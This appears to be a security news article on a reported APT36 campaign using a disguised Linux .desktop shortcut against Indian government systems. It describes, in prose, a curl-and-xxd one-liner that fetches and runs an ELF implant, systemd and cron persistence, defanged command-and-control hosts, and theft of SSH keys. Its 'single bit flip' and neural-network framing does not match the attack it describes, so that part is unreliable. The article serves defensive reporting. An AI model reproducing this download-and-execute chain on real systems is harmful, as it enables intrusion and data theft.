OneFlip Attack Backdoors AI Systems by Flipping a Single Bit in Neural Networks

CYFIRMA researchers have uncovered a campaign they have codenamed “OneFlip”, an operation that demonstrates how a single-bit modification inside a seemingly benign file can be enough to re-pivot a neural-network-driven security workflow and open a backdoor on the underlying host.

Transparent Tribe (APT36) is leveraging the trick against India’s Government networks that rely on the indigenous BOSS GNU/Linux distribution, while continuing to run a parallel Windows lure for mixed-fleet environments.

The group’s lure, first seen on 1 August 2025, arrives by spear-phishing email as the archive “Meeting_Notice_Ltr_ID1543ops.pdf_.zip”.

Inside sits a shortcut called “Meeting_Ltr_ID1543ops.pdf.desktop” whose icon, MIME type and filename convince most users and, crucially, many machine-learning-based mail gateways that it is only a PDF link.

APT36 weaponises Linux “.desktop” shortcuts

The novelty sits in the Exec= line. By toggling a single hexadecimal character, the attackers replace the legitimate viewer call with a Bash one-liner: curl silently retrieves a hex-encoded payload from hxxps://securestore[.]cv/Mt_dated_29.txt, pipes it through xxd to rebuild raw ELF, drops it in /tmp with a timestamped name, marks it executable and launches it under nohup.

Firefox is then opened on an innocuous Google Drive PDF to complete the illusion of normality.

Because the file is declared Type=Application and Terminal=false, no console appears, while X-GNOME-Autostart-enabled=true guarantees the shortcut fires on every log-in, flipping a single persistence bit inside the user’s session metadata.

Static inspection of the secondary ELF (“Meeting_Ltr_ID1543ops.pdf-.elf”, MD5 5bfeeae3cc9386513dc7c301c61e67a7) reveals stripped section names, oversized NOBITS regions and a hard-coded string for hxxp://modgovindia[.]space:4000.

Runtime analysis confirms that the implant registers a per-user systemd timer named system-update.service and duplicates itself to ~/.config/systemd/systemd-update, then writes a reboot-persistent cron entry.

Stealth persistence established

Socket traces show non-blocking DNS queries via 127.0.0.53 that resolve modgovindia[.]space to 45[.]141[.]58[.]199, after which an encrypted bidirectional channel is negotiated on TCP/4000 for tasking and data exfiltration.

The implant has already been caught siphoning directory listings, local user databases and SSH keys, indicating the adversary is staging wider lateral movement.

The OneFlip moniker reflects the campaign’s ability to defeat automated inspection pipelines that now rely heavily on deep-learning classifiers.

By embedding its malicious logic in the unstructured Exec string and altering only a single byte relative to a legitimate template, the shortcut retains a near-identical feature vector; the neural net continues to score it as benign, while human operators see only a PDF icon.

This underscores a broader weakness in AI-assisted filtering: models that are not retrained on Linux-specific threat artefacts are blind to subtle, syntax-level perturbations.

Defenders should harden BOSS hosts with noexec mounts on /tmp, block outbound access to newly registered domains, and deploy an EDR that inspects .desktop files for compound shell directives.

Mail systems must detonate Linux shortcuts in sandboxed VMs because signature-less, single-bit polymorphism is now a proven bypass technique.

Finally, security teams running machine-learning detection stacks should expand training sets to include Linux UI artefacts and test adversarial robustness against command-concatenation patterns.

CYFIRMA assesses that APT36 will continue enriching its backdoor until host-based models learn to spot these minimal flips; until then, the group retains a stealthy, dual-platform foothold inside critical Indian Government infrastructure.

Indicators of Compromise

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!